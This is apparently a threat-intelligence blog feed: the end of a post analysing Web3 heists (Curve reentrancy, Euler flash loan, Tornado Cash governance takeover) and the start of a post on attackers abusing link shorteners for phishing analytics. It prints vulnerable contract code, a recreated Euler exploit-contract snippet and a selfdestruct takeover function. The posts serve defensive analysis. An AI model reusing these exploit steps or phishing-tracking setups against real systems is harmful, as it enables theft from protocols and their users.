them later. The withdraw function would typically check if the user has enough balance before initiating the transfer. Despite this check, a malicious contract can exploit the smart contract by triggering multiple withdraw calls before the first transfer is complete. This bypasses the balance check because the contract's state has not been updated yet, leading to unauthorized withdrawals. The transfer process is repeated until the pool has no more available funds. This vulnerable pattern is present in the Vyper code targeted in the </span><a href="https://cryptomaton.medium.com/a-deep-dive-into-how-curve-pools-70-million-reentrancy-exploit-was-possible-7e0db6b0cecf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Curve Finance exploit</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">@nonreentrant('lock')</span><br/></code><code style="vertical-align: baseline;">def remove_liquidity(<br/></code><code style="vertical-align: baseline;"> _burn_amount: uint256,<br/></code><code style="vertical-align: baseline;"> _min_amounts: uint256[N_COINS],<br/></code><code style="vertical-align: baseline;"> _receiver: address = msg.sender<br/></code><code style="vertical-align: baseline;">) -&gt; uint256[N_COINS]:<br/></code><code style="vertical-align: baseline;"> """<br/></code><code style="vertical-align: baseline;"> @notice Withdraw coins from the pool<br/></code><code style="vertical-align: baseline;"> @dev Withdrawal amounts are based on current deposit ratios<br/></code><code style="vertical-align: baseline;"> @param _burn_amount Quantity of LP tokens to burn in the withdrawal<br/></code><code style="vertical-align: baseline;"> @param _min_amounts Minimum amounts of underlying coins to receive<br/></code><code style="vertical-align: baseline;"> @param _receiver Address that receives the withdrawn coins<br/></code><code style="vertical-align: baseline;"> @return List of amounts of coins that were withdrawn<br/></code><code style="vertical-align: baseline;"> """<br/></code><code style="vertical-align: baseline;"> total_supply: uint256 = self.totalSupply<br/></code><code style="vertical-align: baseline;"> amounts: uint256[N_COINS] = empty(uint256[N_COINS])</code></p> <p><code style="vertical-align: baseline;"> for i in range(N_COINS):<br/></code><code style="vertical-align: baseline;"> old_balance: uint256 = self.balances[i]<br/></code><code style="vertical-align: baseline;"> value: uint256 = old_balance * _burn_amount / total_supply<br/></code><code style="vertical-align: baseline;"> assert value &gt;= _min_amounts[i], "Withdrawal resulted in fewer coins than expected"<br/></code><code style="vertical-align: baseline;"> self.balances[i] = old_balance - value<br/></code><code style="vertical-align: baseline;"> amounts[i] = value<br/></code></p> <p><code style="vertical-align: baseline;"> if i == 0:<br/></code><code style="vertical-align: baseline;"> raw_call(_receiver, b"", value=value)<br/></code><code style="vertical-align: baseline;"> else:<br/></code><code style="vertical-align: baseline;"> response: Bytes[32] = </code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">raw_call</span></code><code style="vertical-align: baseline;">(<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">self.coins[1]</span></code><code style="vertical-align: baseline;">,<br/></code><code style="vertical-align: baseline;"> concat(<br/></code><code style="vertical-align: baseline;"> method_id("transfer(address,uint256)"),<br/></code><code style="vertical-align: baseline;"> convert(_receiver, bytes32),<br/></code><code style="vertical-align: baseline;"> convert(value, bytes32),<br/></code><code style="vertical-align: baseline;"> ),<br/></code><code style="vertical-align: baseline;"> max_outsize=32,<br/></code><code style="vertical-align: baseline;"> )<br/></code><code style="vertical-align: baseline;"> if len(response) &gt; 0:<br/></code><code style="vertical-align: baseline;"> assert convert(response, bool)<br/></code></p> <p><code style="vertical-align: baseline;"> total_supply -= _burn_amount<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">self.balanceOf[msg.sender] -= _burn_amount</span><br/></code><code style="vertical-align: baseline;"> self.totalSupply = total_supply<br/></code><code style="vertical-align: baseline;"> log Transfer(msg.sender, ZERO_ADDRESS, _burn_amount)<br/></code></p> <p><code style="vertical-align: baseline;"> log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply)<br/></code></p> <p><code style="vertical-align: baseline;"> return amounts</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 4: The Vulnerable Curve Finance </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> function</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> smart contract updates how much liquidity </span><code style="vertical-align: baseline;">msg.sender</code><span style="vertical-align: baseline;"> has in the pool by subtracting the burn fee with </span><code style="vertical-align: baseline;">self.balanceOf[msg.sender] -= _burn_amount</code><span style="vertical-align: baseline;">. This is followed by a call to </span><code style="vertical-align: baseline;">Transfer()</code><span style="vertical-align: baseline;"> on the </span><code style="vertical-align: baseline;">msg.sender</code><span style="vertical-align: baseline;"> for the amount associated with the account. </span></p> <p><span style="vertical-align: baseline;">The issue lies at the external call to </span><code style="vertical-align: baseline;">self.coins[1]</code><span style="vertical-align: baseline;">. Here, the </span><code style="vertical-align: baseline;">@nonreentrant</code><span style="vertical-align: baseline;"> modifier did not protect the function from being re-entered within the same transaction before the external call. Therefore, an attacker was able to manipulate the external call to </span><code style="vertical-align: baseline;">self.coins[1]</code><span style="vertical-align: baseline;"> to recursively make a </span><code style="vertical-align: baseline;">raw_call</code><span style="vertical-align: baseline;"> back into the original </span><code style="vertical-align: baseline;">remove_liquidity</code><span style="vertical-align: baseline;"> function before it had finished updating the state variables. Due to the faulty </span><code style="vertical-align: baseline;">@nonreentrant</code><span style="vertical-align: baseline;"> modifier, the layout of the smart contract led to the draining of funds from the contract.</span></p> <h3><span style="vertical-align: baseline;">Flash Loan Attack</span></h3> <p><span style="vertical-align: baseline;">Another common attack vector for smart contracts are "flash loan attacks." Flash loans are unsecured debt (no collateral) that must be repaid in the same transaction. There are legitimate uses of flash loans (e.g., arbitrage), but hackers can also use them to manipulate DeFi pricing oracles by buying or short selling high volumes of tokens that have thin supply. </span></p> <h4><span style="vertical-align: baseline;">Euler Finance Hack</span></h4> <p><span style="vertical-align: baseline;">In March 2023, the DeFi lending protocol Euler Finance suffered a </span><a href="https://medium.com/@omniscia.io/euler-finance-incident-post-mortem-1ce077c28454" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">flash loan attack</span></a><span style="vertical-align: baseline;"> that resulted in the theft of nearly $200 million. The attacker initially used </span><a href="https://home.treasury.gov/news/press-releases/jy0916" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Tornado Cash</span></a><span style="vertical-align: baseline;">, a mixer that obfuscates the origins and ownership of cryptocurrency, to obtain the funds necessary for the heist. The attacker initiated a flash loan to borrow $30 million from the DeFi protocol </span><a href="https://aave.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Aave</span></a><span style="vertical-align: baseline;">. The attacker then deposited $20 million of the borrowed </span><a href="https://en.wikipedia.org/wiki/Dai_(cryptocurrency)" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DAI</span></a><span style="vertical-align: baseline;"> stablecoin into Euler, receiving eDAI tokens in return. These eDAI tokens were then leveraged to borrow ten times their value. The attacker used the remaining $10 million in DAI to repay part of the debt, and then exploited a flaw in Euler's system to repeatedly borrow more funds using the same mint function until the flash loan was finally closed.</span></p> <p><span style="vertical-align: baseline;">The blockchain security firm </span><a href="https://x.com/peckshield/status/1635231791509549057?s=20" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PeckShield</span></a><span style="vertical-align: baseline;"> identified the vulnerability in Euler Finance’s </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> function. The contract permits a user to donate their balance to the </span><code style="vertical-align: baseline;">reserveBalance</code><span style="vertical-align: baseline;"> of the token they are transacting with. No health check is performed on the account that initiates the donation. A donation via </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> could also reduce a user's equity (EToken) balance without affecting their debt (DToken), causing an imbalance that could lead to a liquidation. During liquidation, a percentage-based discount is applied to the collateral, incentivizing liquidators to take on the debt. The attacker intentionally over-leveraged their position to cause a significant discount before triggering a self-liquidation. The substantial discount ensured the attacker acquired the collateral cheaply while having their remaining assets cover their debts. This left Euler Finance with a significant amount of unbacked "bad debt" and the attacker with a highly profitable, over-collateralized position.</span></p> <p><span style="vertical-align: baseline;">A </span><a href="https://github.com/iphelix/euler-exploit-poc/blob/main/pocs/EulerHack.sol" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">recreation</span></a><span style="vertical-align: baseline;"> of the </span><code style="vertical-align: baseline;">violator</code><span style="vertical-align: baseline;"> contract used in the Euler Finance hack helps visualize the steps taken to perform the heist. The contract deposits two-thirds of their initial token balance into the protocol as collateral to gain borrowing power. The contract borrows a significant amount of </span><code style="vertical-align: baseline;">eToken</code><span style="vertical-align: baseline;"> against their deposited collateral and repays one-third of their initial balance. The contract proceeds to borrow the original amount of eToken again and invokes </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> to force a liquidation of their own position.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">function violator(address exploit, uint256 initialBalance, uint256 mintAmount, uint256 donateAmount, uint256 maxWithdraw, IERC20 token, EToken eToken, DToken dToken) external returns (bool) {</code></p> <p><code style="vertical-align: baseline;"> token.approve(EulerProtocol.euler, type(uint256).max);</code></p> <p><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.deposit(0, (2 * initialBalance / 3) * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.mint(0, mintAmount * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">dToken.repay(0, (initialBalance / 3) * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.mint(0, mintAmount * 10**token.decimals());</span><br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">eToken.donateToReserves(0, donateAmount * 10**eToken.decimals());</span></code></p> <p><code style="vertical-align: baseline;"> console.log("[*] Generated bad loan...");<br/></code><code style="vertical-align: baseline;"> console.log(" Collateral: %d Debt: %d", eToken.balanceOf(address(this))/10**eToken.decimals(), dToken.balanceOf(address(this))/10**dToken.decimals());</code></p> <p><code style="vertical-align: baseline;"> return liquidator.liquidate(exploit, initialBalance, mintAmount, donateAmount, maxWithdraw, address(this), token, eToken, dToken);<br/></code><code style="vertical-align: baseline;">}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 5: Recreated Snippet from Violator Contract used in the Euler Finance Hack</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">donateToReserves</code><span style="vertical-align: baseline;"> contract was missing a health check to confirm the donator's debt is greater than or equal to the donation amount as the debt should be reduced or otherwise be set to zero. On April 4, 2023, The Euler Foundation released a statement regarding the theft of $200 million in assets, stating that after successful negotiations, all recoverable funds were returned. While this is one of the largest recoveries of stolen digital assets to date, it also presented a challenge to the DeFi insurer </span><a href="https://www.coindesk.com/business/2023/04/12/top-defi-insurer-paid-millions-to-euler-hack-victims-now-nexus-mutual-wants-its-money-back/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Nexus Mutual who had paid out claims</span></a><span style="vertical-align: baseline;"> to victims of the Euler hack.</span></p> <h2><span style="vertical-align: baseline;">Governance Attack</span></h2> <p><span style="vertical-align: baseline;">Many decentralized autonomous organizations (DAOs) utilize permissionless voting with a fungible and tradable native token for governance. Governance systems are designed to allow token holders to participate in decision-making about the project, such as which proposals to fund or which changes to make to the protocol. A "</span><a href="https://a16zcrypto.com/posts/article/dao-governance-attacks-and-how-to-avoid-them/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">governance attack</span></a><span style="vertical-align: baseline;">" targets the permissionless voting governance system of a DAO such that an attacker can gain control of the project. Governance attacks can be very damaging to Web3 projects because they can lead to loss of funds, disruption of the project, and even the project's collapse.</span></p> <p><span style="vertical-align: baseline;">One common method of performing a governance attack is to acquire a large number of a project's tokens, giving an attacker a significant amount of voting power. Once they have enough voting power, an attacker can propose and vote on malicious proposals, such as draining the project's treasury or changing the rules of the protocol to benefit themselves.</span></p> <h4><span style="vertical-align: baseline;">Tornado Cash Governance Attack</span></h4> <p><span style="vertical-align: baseline;">In May 2023, the cryptocurrency mixer Tornado Cash fell victim to a hostile takeover via a governance attack that drained 10,000 TORN tokens, worth approximately $70,000. The attacker granted themself 1,200,000 votes, surpassing the estimated 700,000 legitimate votes, to give them full control of the Tornado Cash governance. </span></p> <p><span style="vertical-align: baseline;">The heist started with a malicious proposal transaction at </span><code style="vertical-align: baseline;">0x34605f1d6463a48b818157f7b26d040f8dd329273702a0618e9e74fe350e6e0d</code><span style="vertical-align: baseline;"> that claims to penalize relayers that are cheating the protocol. Despite stating the smart contract uses the same logic as one in a previously passed proposal, the new proposed smart contract contained an extra function named </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;">. Although there was a five-day voting period, followed by a two-day execution delay, the issue within the proposal was not identified and the attacker successfully social engineered most members within the community to vote in favor of the proposal by tricking them through the proposal description.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig6b.max-1000x1000.png" alt="Description of the Tornado Cash Malicious Proposal"> </a> <figcaption class="article-image__caption "><p data-block-key="h4bt8">Figure 6: Description of the Tornado Cash Malicious Proposal</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Invoking the new </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;"> function triggers the </span><code style="vertical-align: baseline;">selfdestruct</code><span style="vertical-align: baseline;"> method used to terminate a contract, remove the bytecode from the Ethereum blockchain, and send any contract funds to a specified address. This process lets the attacker destroy the proposal contract, and its creating contract, such that they can update the proposal contract to a new malicious contract and perform the heist.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">function emergencyStop() public onlyOwner {<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">selfdestruct</span></code><code style="vertical-align: baseline;">(payable(0));<br/></code><code style="vertical-align: baseline;">}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: The Invoked </span><code style="vertical-align: baseline;">emergencyStop</code><span style="vertical-align: baseline;"> Function to Start the Overtaking of Tornado Cash Governance</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the proposal was passed by voters, the attacker invoked the </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;"> function and updated the original proposal logic to grant themselves newly minted votes and obtain complete control of the DAO. To receive ownership of the targeted contract in this case, the attacker changed the locked token balance of the contracts they controlled to 10,000 and transferred the tokens to their own address.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig8.max-1000x1000.png" alt="Changing of Locked Token Balance of Attacker Controlled Contracts to 10,000"> </a> <figcaption class="article-image__caption "><p data-block-key="vm3fd">Figure 8: Changing of Locked Token Balance of Attacker Controlled Contracts to 10,000</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">An understanding of past compromises and evolving threats is critical to guard against future attacks and help safeguard digital assets. As cryptocurrency and Web3 organizations expand, with platforms like </span><a href="https://cloud.google.com/web3"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud for Web3</span></a><span style="vertical-align: baseline;"> enabling innovation, they are frequently targeted, regardless of size, and there are typically earlier signs of compromise than the theft itself such as malware or suspicious logins. Organizations must evaluate their security posture and should consider leveraging advanced security solutions, such as </span><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;">, to enable sufficient logging, alerting, and comprehensive incident response investigations to detect attacks and help prevent heists.</span></p></div></description><pubDate>Tue, 03 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>DeFied Expectations — Examining Web3 Heists</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>A Measure of Motive: How Attackers Weaponize Digital Analytics Tools</title><link>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Adrian McCabe, Ryan Tomcik, Stephen Clement</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Introduction</span></h2> <p><span style="vertical-align: baseline;">Digital analytics tools are vital components of the vast domain that is modern cyberspace. From system administrators managing traffic load balancers to marketers and advertisers working to deliver relevant content to their brand’s biggest fan base, tools like link shorteners, location trackers, CAPTCHAs, and digital advertising platforms each play their part in making information universally accessible and useful to all.</span></p> <p><span style="vertical-align: baseline;">However, just as these tools can be used for good, they can also be used for malicious purposes. Mandiant and Google Cloud researchers have witnessed threat actors cleverly repurposing digital analytics and advertising tools to evade detection and amplify the effectiveness of their malicious campaigns.</span></p> <p><span style="vertical-align: baseline;">This blog post dives deep into the threat actor playbook, revealing how these tools can be weaponized by attackers to add malicious data analytics (“malnalytics”) capabilities to their threat campaigns. We'll expose the surprising effectiveness of these tactics and arm defenders with detection and mitigation strategies for their own environments.</span></p> <h2><span style="vertical-align: baseline;">Get Shor.ty</span></h2> <p><span style="vertical-align: baseline;">First entering the scene around the year 2000 and steadily gaining in popularity ever since, link shorteners have become a fairly ubiquitous utility for life on the Internet. In addition to the popular link shortening services like bit.ly and rb.gy, large technology companies like Amazon (a.co) and Google (goo.gl) also have (or had, in </span><a href="https://developers.googleblog.com/en/google-url-shortener-links-will-no-longer-be-available/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google’s case</span></a><span style="vertical-align: baseline;">) their own link shortening structures and schemas. In the legitimate advertising and marketing sense, link shorteners are typically used as a mechanism to track things like click-through rates on advertisements, or to reduce the likelihood that a complicated URL with parameterized arguments will get mangled when being shared. However, link shorteners and link shortening services have also been used by threat actors (</span><a href="https://attack.mitre.org/techniques/T1608/005/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1608.005</span></a><span style="vertical-align: baseline;">) to obscure the URLs of malicious landing pages, and Mandiant has observed threat actors using link shorteners to redirect victims during the initial access phase of an attack chain. Some recent examples include: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A link shortener service used by UNC1189 (also known as “MuddyWater”) in spring of 2022 to funnel users to a phishing lure document hosted on a cloud storage provider.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A set of SMS phishing campaigns orchestrated by a financially motivated threat actor between spring of 2021 and late 2022, which leveraged link shorteners to funnel users through a nested web of device, location, and browser checks to a set of forms that ultimately attempt to steal credit card information.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A malvertising campaign in spring of 2023 that leveraged a link shortener to track click-through data for Dropbox URLs hosting malware payloads. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Behind the ma.sk</span></h3> <p><span style="vertical-align: baseline;">To demonstrate the capabilities of a link shortener service from a threat actor perspective, the service bit.ly will be featured in this blog post. Originally made popular on X (formerly Twitter) around 2008, bit.ly remains a popular link shortening solution. Like most modern software-as-a-service (SaaS) platforms, bit.ly offers multiple subscription levels based around levels of usage and feature availability (Figure 1).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig1.max-1000x1000.png" alt="bit.ly subscription page"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 1: bit.ly subscription page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In an attempt to avoid direct attribution, threat actors may use fake or stolen personal and/or payment information to complete the registration for such a subscription or service. Once the setup process has been completed, attackers can begin to generate shortened links (Figure 2).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig2.max-1000x1000.png" alt="bit.ly destination URL configuration"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 2: bit.ly destination URL configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig3.max-1000x1000.png" alt="bit.ly customized URL configuration"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 3: bit.ly customized URL configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As part of some bit.ly subscription levels, custom fields can be appended to URLs as parameters to gain further insights into their associated activity (see the “Custom URL parameter name” field and value pair in Figure 4). This feature set is obviously quite beneficial for social media brand influencers, marketers, and advertisers, but attackers can use this functionality to get added insights into their campaign activities.</span></p> <p><span style="vertical-align: baseline;">In this fictitious example, let’s say an attacker intends to use a shortened bit.ly link as part of a larger SMS phishing campaign targeting phone numbers within the “703” area code. When opened, the link will direct users to an attacker-controlled fake payment site enticing the user to pay urgent outstanding invoices.</span></p> <p><span style="vertical-align: baseline;">The attacker can configure parameters (Figure 4) to generate an Urchin Tracking Module (UTM) URL specific to this component of the phishing campaign (Figure 5) for tracking purposes. This bit.ly article contains more information on the </span><a href="https://bitly.com/blog/utm-parameters/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">legitimate use of these types of URL data fields</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig4.max-1000x1000.png" alt="Customized UTM parameter configuration"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 4: Customized UTM parameter configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig5.max-1000x1000.png" alt="Parameterized URL structure with UTM fields"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 5: Parameterized URL structure with UTM fields</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Though attackers typically would not have such fields in the URL parameters for their campaign infrastructure as overtly labeled as the example in Figure 5, the effectiveness of leveraging such online marketing integrations and data fields is readily apparent. In this scenario: </span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Source</strong><span style="vertical-align: baseline;"> is a designator for a list of active phone numbers that can receive SMS messages. While the list itself and the infrastructure to send the messages would reside outside of bit.ly, bit.ly can be used to correlate corresponding click-through activity through these URL parameters.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;"> is the mechanism by which a victim would be exposed to the link. In this case, “sender_1” would be a way for the attacker to correlate the downstream victim to the phone number in the attacker’s infrastructure that originally sent them the message.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Campaign</strong><span style="vertical-align: baseline;"> is the aggregated bucket of related activity visible within bit.ly. In bit.ly, an individual campaign can have many different links tied to it, but the associated activity can be tracked concurrently.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Term</strong><span style="vertical-align: baseline;"> is an optional field that has a legitimate use for mapping search engine keywords or terms to strategically placed bit.ly links by advertisers.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Custom URL parameter name - targeting_area_code, 703: </strong><span style="vertical-align: baseline;">This is an entirely customized bit.ly field included for the purposes of this scenario that signifies which area code the attacker will be targeting with this specific link. In this case, the attacker will be targeting Washington D.C., metropolitan area residents in Northern Virginia.</span></li> </ul> <p><span style="vertical-align: baseline;">After these parameters are selected and the bit.ly links are fully configured, attackers can put their links into action. Once a campaign is underway and links are distributed through their medium of choice, attackers can monitor the activity to their shortened links using a dashboard interface (Figure 6).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig6.max-1000x1000.png" alt="bit.ly click-through analytics dashboard"> </a> <figcaption class="article-image__caption "><p 